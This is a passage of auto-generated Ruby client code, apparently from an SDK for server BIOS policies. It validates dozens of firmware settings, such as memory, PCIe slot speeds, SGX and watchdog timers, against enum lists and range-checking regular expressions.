memory_mapped_io_above4gb_validator.valid?(@memory_mapped_io_above4gb)\n memory_refresh_rate_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1x Refresh\", \"2x Refresh\"])\n return false unless memory_refresh_rate_validator.valid?(@memory_refresh_rate)\n return false if !@memory_size_limit.nil? 
&& @memory_size_limit !~ Regexp.new(/^(\\d|[1-9]\\d|[1-9]\\d{2}|[1-9]\\d{3}|[1-5]\\d{4}|6[0-4]\\d{3}|65[0-4]\\d{2}|655[0-2]\\d|6553[0-5])$|^(platform-default)$/)\n memory_thermal_throttling_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"CLTT with PECI\", \"Disabled\"])\n return false unless memory_thermal_throttling_validator.valid?(@memory_thermal_throttling)\n mirroring_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"inter-socket\", \"intra-socket\"])\n return false unless mirroring_mode_validator.valid?(@mirroring_mode)\n mmcfg_base_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1 GB\", \"2 GB\", \"2.5 GB\", \"3 GB\", \"Auto\"])\n return false unless mmcfg_base_validator.valid?(@mmcfg_base)\n network_stack_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless network_stack_validator.valid?(@network_stack)\n numa_optimized_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless numa_optimized_validator.valid?(@numa_optimized)\n nvmdimm_perform_config_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"BW Optimized\", \"Balanced Profile\", \"Latency Optimized\"])\n return false unless nvmdimm_perform_config_validator.valid?(@nvmdimm_perform_config)\n onboard10gbit_lom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless onboard10gbit_lom_validator.valid?(@onboard10gbit_lom)\n onboard_gbit_lom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless onboard_gbit_lom_validator.valid?(@onboard_gbit_lom)\n onboard_scu_storage_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless onboard_scu_storage_support_validator.valid?(@onboard_scu_storage_support)\n onboard_scu_storage_sw_stack_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Intel RSTe\", \"LSI SW RAID\"])\n return false unless onboard_scu_storage_sw_stack_validator.valid?(@onboard_scu_storage_sw_stack)\n operation_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Test Only\", \"Test and Repair\"])\n return false unless operation_mode_validator.valid?(@operation_mode)\n os_boot_watchdog_timer_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless os_boot_watchdog_timer_validator.valid?(@os_boot_watchdog_timer)\n os_boot_watchdog_timer_policy_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"do-nothing\", \"power-off\", \"reset\"])\n return false unless os_boot_watchdog_timer_policy_validator.valid?(@os_boot_watchdog_timer_policy)\n os_boot_watchdog_timer_timeout_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"5-minutes\", \"10-minutes\", \"15-minutes\", \"20-minutes\"])\n return false unless os_boot_watchdog_timer_timeout_validator.valid?(@os_boot_watchdog_timer_timeout)\n out_of_band_mgmt_port_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless out_of_band_mgmt_port_validator.valid?(@out_of_band_mgmt_port)\n package_cstate_limit_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"C0 C1 State\", \"C0/C1\", \"C2\", \"C6 Non 
Retention\", \"C6 Retention\", \"No Limit\"])\n return false unless package_cstate_limit_validator.valid?(@package_cstate_limit)\n panic_high_watermark_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"High\", \"Low\"])\n return false unless panic_high_watermark_validator.valid?(@panic_high_watermark)\n partial_cache_line_sparing_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless partial_cache_line_sparing_validator.valid?(@partial_cache_line_sparing)\n partial_mirror_mode_config_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"Percentage\", \"Value in GB\"])\n return false unless partial_mirror_mode_config_validator.valid?(@partial_mirror_mode_config)\n return false if !@partial_mirror_percent.nil? && @partial_mirror_percent !~ Regexp.new(/^(\\d\\.\\d{1,2}|[1-4]\\d\\.\\d{1,2}|50\\.[0]{1,2})$|^(platform-default)$/)\n return false if !@partial_mirror_value1.nil? && @partial_mirror_value1 !~ Regexp.new(/^(\\d|[1-9]\\d|[1-9]\\d{2}|[1-9]\\d{3}|[1-5]\\d{4}|6[0-4]\\d{3}|65[0-4]\\d{2}|655[0-2]\\d|6553[0-5])$|^(platform-default)$/)\n return false if !@partial_mirror_value2.nil? && @partial_mirror_value2 !~ Regexp.new(/^(\\d|[1-9]\\d|[1-9]\\d{2}|[1-9]\\d{3}|[1-5]\\d{4}|6[0-4]\\d{3}|65[0-4]\\d{2}|655[0-2]\\d|6553[0-5])$|^(platform-default)$/)\n return false if !@partial_mirror_value3.nil? && @partial_mirror_value3 !~ Regexp.new(/^(\\d|[1-9]\\d|[1-9]\\d{2}|[1-9]\\d{3}|[1-5]\\d{4}|6[0-4]\\d{3}|65[0-4]\\d{2}|655[0-2]\\d|6553[0-5])$|^(platform-default)$/)\n return false if !@partial_mirror_value4.nil? && @partial_mirror_value4 !~ Regexp.new(/^(\\d|[1-9]\\d|[1-9]\\d{2}|[1-9]\\d{3}|[1-5]\\d{4}|6[0-4]\\d{3}|65[0-4]\\d{2}|655[0-2]\\d|6553[0-5])$|^(platform-default)$/)\n patrol_scrub_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"Enable at End of POST\", \"enabled\"])\n return false unless patrol_scrub_validator.valid?(@patrol_scrub)\n return false if !@patrol_scrub_duration.nil? 
&& @patrol_scrub_duration !~ Regexp.new(/^([5-9]|1\\d|2[0-3])$|^(platform-default)$/)\n pc_ie_ras_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pc_ie_ras_support_validator.valid?(@pc_ie_ras_support)\n pc_ie_ssd_hot_plug_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pc_ie_ssd_hot_plug_support_validator.valid?(@pc_ie_ssd_hot_plug_support)\n pch_usb30mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pch_usb30mode_validator.valid?(@pch_usb30mode)\n pci_option_ro_ms_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless pci_option_ro_ms_validator.valid?(@pci_option_ro_ms)\n pci_rom_clp_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pci_rom_clp_validator.valid?(@pci_rom_clp)\n pcie_ari_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless pcie_ari_support_validator.valid?(@pcie_ari_support)\n pcie_pll_ssc_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"ZeroPointFive\"])\n return false unless pcie_pll_ssc_validator.valid?(@pcie_pll_ssc)\n pcie_slot_mraid1link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless pcie_slot_mraid1link_speed_validator.valid?(@pcie_slot_mraid1link_speed)\n pcie_slot_mraid1option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_mraid1option_rom_validator.valid?(@pcie_slot_mraid1option_rom)\n pcie_slot_mraid2link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless pcie_slot_mraid2link_speed_validator.valid?(@pcie_slot_mraid2link_speed)\n pcie_slot_mraid2option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_mraid2option_rom_validator.valid?(@pcie_slot_mraid2option_rom)\n pcie_slot_mstorraid_link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless pcie_slot_mstorraid_link_speed_validator.valid?(@pcie_slot_mstorraid_link_speed)\n pcie_slot_mstorraid_option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_mstorraid_option_rom_validator.valid?(@pcie_slot_mstorraid_option_rom)\n pcie_slot_nvme1link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless pcie_slot_nvme1link_speed_validator.valid?(@pcie_slot_nvme1link_speed)\n pcie_slot_nvme1option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_nvme1option_rom_validator.valid?(@pcie_slot_nvme1option_rom)\n pcie_slot_nvme2link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", 
\"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless pcie_slot_nvme2link_speed_validator.valid?(@pcie_slot_nvme2link_speed)\n pcie_slot_nvme2option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_nvme2option_rom_validator.valid?(@pcie_slot_nvme2option_rom)\n pcie_slot_nvme3link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless pcie_slot_nvme3link_speed_validator.valid?(@pcie_slot_nvme3link_speed)\n pcie_slot_nvme3option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_nvme3option_rom_validator.valid?(@pcie_slot_nvme3option_rom)\n pcie_slot_nvme4link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless pcie_slot_nvme4link_speed_validator.valid?(@pcie_slot_nvme4link_speed)\n pcie_slot_nvme4option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_nvme4option_rom_validator.valid?(@pcie_slot_nvme4option_rom)\n pcie_slot_nvme5link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless pcie_slot_nvme5link_speed_validator.valid?(@pcie_slot_nvme5link_speed)\n pcie_slot_nvme5option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_nvme5option_rom_validator.valid?(@pcie_slot_nvme5option_rom)\n pcie_slot_nvme6link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless pcie_slot_nvme6link_speed_validator.valid?(@pcie_slot_nvme6link_speed)\n pcie_slot_nvme6option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_nvme6option_rom_validator.valid?(@pcie_slot_nvme6option_rom)\n pcie_slots_cdn_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slots_cdn_enable_validator.valid?(@pcie_slots_cdn_enable)\n pop_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pop_support_validator.valid?(@pop_support)\n post_error_pause_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless post_error_pause_validator.valid?(@post_error_pause)\n post_package_repair_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Disabled\", \"Hard PPR\"])\n return false unless post_package_repair_validator.valid?(@post_package_repair)\n processor_c1e_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless processor_c1e_validator.valid?(@processor_c1e)\n processor_c3report_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless processor_c3report_validator.valid?(@processor_c3report)\n processor_c6report_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false 
unless processor_c6report_validator.valid?(@processor_c6report)\n processor_cstate_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless processor_cstate_validator.valid?(@processor_cstate)\n psata_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"AHCI\", \"Disabled\", \"LSI SW RAID\"])\n return false unless psata_validator.valid?(@psata)\n pstate_coord_type_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"HW ALL\", \"SW ALL\", \"SW ANY\"])\n return false unless pstate_coord_type_validator.valid?(@pstate_coord_type)\n putty_key_pad_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"ESCN\", \"LINUX\", \"SCO\", \"VT100\", \"VT400\", \"XTERMR6\"])\n return false unless putty_key_pad_validator.valid?(@putty_key_pad)\n pwr_perf_tuning_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"bios\", \"os\", \"peci\"])\n return false unless pwr_perf_tuning_validator.valid?(@pwr_perf_tuning)\n qpi_link_frequency_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"6.4-gt/s\", \"7.2-gt/s\", \"8.0-gt/s\", \"9.6-gt/s\", \"auto\"])\n return false unless qpi_link_frequency_validator.valid?(@qpi_link_frequency)\n qpi_link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"10.4GT/s\", \"11.2GT/s\", \"9.6GT/s\", \"Auto\"])\n return false unless qpi_link_speed_validator.valid?(@qpi_link_speed)\n qpi_snoop_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"auto\", \"cluster-on-die\", \"early-snoop\", \"home-directory-snoop\", \"home-directory-snoop-with-osb\", \"home-snoop\"])\n return false unless qpi_snoop_mode_validator.valid?(@qpi_snoop_mode)\n rank_inter_leave_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1-way\", \"2-way\", \"4-way\", \"8-way\", \"auto\"])\n return false unless rank_inter_leave_validator.valid?(@rank_inter_leave)\n redirection_after_post_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Always Enable\", \"Bootloader\"])\n return false unless redirection_after_post_validator.valid?(@redirection_after_post)\n sata_mode_select_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"AHCI\", \"Disabled\", \"LSI SW RAID\"])\n return false unless sata_mode_select_validator.valid?(@sata_mode_select)\n select_memory_ras_configuration_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"adddc-sparing\", \"lockstep\", \"maximum-performance\", \"mirror-mode-1lm\", \"mirroring\", \"partial-mirror-mode-1lm\", \"sparing\"])\n return false unless select_memory_ras_configuration_validator.valid?(@select_memory_ras_configuration)\n select_ppr_type_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"Hard PPR\", \"Soft PPR\"])\n return false unless select_ppr_type_validator.valid?(@select_ppr_type)\n serial_port_aenable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless serial_port_aenable_validator.valid?(@serial_port_aenable)\n sev_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"253 ASIDs\", \"509 ASIDs\", \"Auto\"])\n return false unless sev_validator.valid?(@sev)\n sgx_auto_registration_agent_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless 
sgx_auto_registration_agent_validator.valid?(@sgx_auto_registration_agent)\n return false if !@sgx_epoch0.nil? && @sgx_epoch0 !~ Regexp.new(/^([0-9a-fA-F]{1,16})$|^(platform-default)$/)\n return false if !@sgx_epoch1.nil? && @sgx_epoch1 !~ Regexp.new(/^([0-9a-fA-F]{1,16})$|^(platform-default)$/)\n sgx_factory_reset_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sgx_factory_reset_validator.valid?(@sgx_factory_reset)\n return false if !@sgx_le_pub_key_hash0.nil? && @sgx_le_pub_key_hash0 !~ Regexp.new(/^([0-9a-fA-F]{1,16})$|^(platform-default)$/)\n return false if !@sgx_le_pub_key_hash1.nil? && @sgx_le_pub_key_hash1 !~ Regexp.new(/^([0-9a-fA-F]{1,16})$|^(platform-default)$/)\n return false if !@sgx_le_pub_key_hash2.nil? && @sgx_le_pub_key_hash2 !~ Regexp.new(/^([0-9a-fA-F]{1,16})$|^(platform-default)$/)\n return false if !@sgx_le_pub_key_hash3.nil? && @sgx_le_pub_key_hash3 !~ Regexp.new(/^([0-9a-fA-F]{1,16})$|^(platform-default)$/)\n sgx_le_wr_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sgx_le_wr_validator.valid?(@sgx_le_wr)\n sgx_package_info_in_band_access_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sgx_package_info_in_band_access_validator.valid?(@sgx_package_info_in_band_access)\n sgx_qos_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sgx_qos_validator.valid?(@sgx_qos)\n sha1pcr_bank_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sha1pcr_bank_validator.valid?(@sha1pcr_bank)\n sha256pcr_bank_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sha256pcr_bank_validator.valid?(@sha256pcr_bank)\n single_pctl_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"No\", \"Yes\"])\n return false unless single_pctl_enable_validator.valid?(@single_pctl_enable)\n slot10link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot10link_speed_validator.valid?(@slot10link_speed)\n slot10state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot10state_validator.valid?(@slot10state)\n slot11link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot11link_speed_validator.valid?(@slot11link_speed)\n slot11state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot11state_validator.valid?(@slot11state)\n slot12link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot12link_speed_validator.valid?(@slot12link_speed)\n slot12state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot12state_validator.valid?(@slot12state)\n slot13state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless 
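      # For reference, a minimal sketch of the EnumAttributeValidator these
      # checks rely on, as commonly emitted by OpenAPI Generator for Ruby
      # clients; the exact template varies by generator version, so the nil
      # handling and type coercion below are assumptions rather than this
      # SDK's verbatim source:
      #
      #   class EnumAttributeValidator
      #     attr_reader :datatype, :allowable_values
      #
      #     def initialize(datatype, allowable_values)
      #       @datatype = datatype
      #       # Coerce the allowed literals to the declared primitive type.
      #       @allowable_values = allowable_values.map do |value|
      #         case datatype.to_s
      #         when /Integer/i then value.to_i
      #         when /Float/i   then value.to_f
      #         else value
      #         end
      #       end
      #     end
      #
      #     # A nil (unset) attribute passes; any other value must match one
      #     # of the allowed literals exactly, so comparison is case-sensitive:
      #     # valid?("enabled") #=> true, valid?("Enabled") #=> false.
      #     def valid?(value)
      #       !value || allowable_values.include?(value)
      #     end
      #   end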
      slot14state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot14state_validator.valid?(@slot14state)
      slot1link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot1link_speed_validator.valid?(@slot1link_speed)
      slot1state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot1state_validator.valid?(@slot1state)
      slot2link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot2link_speed_validator.valid?(@slot2link_speed)
      slot2state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot2state_validator.valid?(@slot2state)
      slot3link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot3link_speed_validator.valid?(@slot3link_speed)
      slot3state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot3state_validator.valid?(@slot3state)
      slot4link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot4link_speed_validator.valid?(@slot4link_speed)
      slot4state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot4state_validator.valid?(@slot4state)
      slot5link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot5link_speed_validator.valid?(@slot5link_speed)
      slot5state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot5state_validator.valid?(@slot5state)
      slot6link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot6link_speed_validator.valid?(@slot6link_speed)
      slot6state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot6state_validator.valid?(@slot6state)
      slot7link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot7link_speed_validator.valid?(@slot7link_speed)
      slot7state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot7state_validator.valid?(@slot7state)
      slot8link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot8link_speed_validator.valid?(@slot8link_speed)
      slot8state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot8state_validator.valid?(@slot8state)
      slot9link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot9link_speed_validator.valid?(@slot9link_speed)
      slot9state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot9state_validator.valid?(@slot9state)
      slot_flom_link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_flom_link_speed_validator.valid?(@slot_flom_link_speed)
      slot_front_nvme10link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_front_nvme10link_speed_validator.valid?(@slot_front_nvme10link_speed)
      slot_front_nvme10option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme10option_rom_validator.valid?(@slot_front_nvme10option_rom)
      slot_front_nvme11link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_front_nvme11link_speed_validator.valid?(@slot_front_nvme11link_speed)
      slot_front_nvme11option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme11option_rom_validator.valid?(@slot_front_nvme11option_rom)
      slot_front_nvme12link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_front_nvme12link_speed_validator.valid?(@slot_front_nvme12link_speed)
      slot_front_nvme12option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme12option_rom_validator.valid?(@slot_front_nvme12option_rom)
      slot_front_nvme13option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme13option_rom_validator.valid?(@slot_front_nvme13option_rom)
      slot_front_nvme14option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme14option_rom_validator.valid?(@slot_front_nvme14option_rom)
      slot_front_nvme15option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme15option_rom_validator.valid?(@slot_front_nvme15option_rom)
      slot_front_nvme16option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme16option_rom_validator.valid?(@slot_front_nvme16option_rom)
      slot_front_nvme17option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme17option_rom_validator.valid?(@slot_front_nvme17option_rom)
      slot_front_nvme18option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme18option_rom_validator.valid?(@slot_front_nvme18option_rom)
      slot_front_nvme19option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme19option_rom_validator.valid?(@slot_front_nvme19option_rom)
      slot_front_nvme1link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_front_nvme1link_speed_validator.valid?(@slot_front_nvme1link_speed)
      slot_front_nvme1option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme1option_rom_validator.valid?(@slot_front_nvme1option_rom)
      slot_front_nvme20option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme20option_rom_validator.valid?(@slot_front_nvme20option_rom)
      slot_front_nvme21option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme21option_rom_validator.valid?(@slot_front_nvme21option_rom)
      slot_front_nvme22option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme22option_rom_validator.valid?(@slot_front_nvme22option_rom)
      slot_front_nvme23option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme23option_rom_validator.valid?(@slot_front_nvme23option_rom)
      slot_front_nvme24option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme24option_rom_validator.valid?(@slot_front_nvme24option_rom)
      slot_front_nvme2link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_front_nvme2link_speed_validator.valid?(@slot_front_nvme2link_speed)
      slot_front_nvme2option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme2option_rom_validator.valid?(@slot_front_nvme2option_rom)
      slot_front_nvme3link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_front_nvme3link_speed_validator.valid?(@slot_front_nvme3link_speed)
      slot_front_nvme3option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme3option_rom_validator.valid?(@slot_front_nvme3option_rom)
      slot_front_nvme4link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_front_nvme4link_speed_validator.valid?(@slot_front_nvme4link_speed)
      slot_front_nvme4option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme4option_rom_validator.valid?(@slot_front_nvme4option_rom)
      slot_front_nvme5link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_front_nvme5link_speed_validator.valid?(@slot_front_nvme5link_speed)
      slot_front_nvme5option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme5option_rom_validator.valid?(@slot_front_nvme5option_rom)
      slot_front_nvme6link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
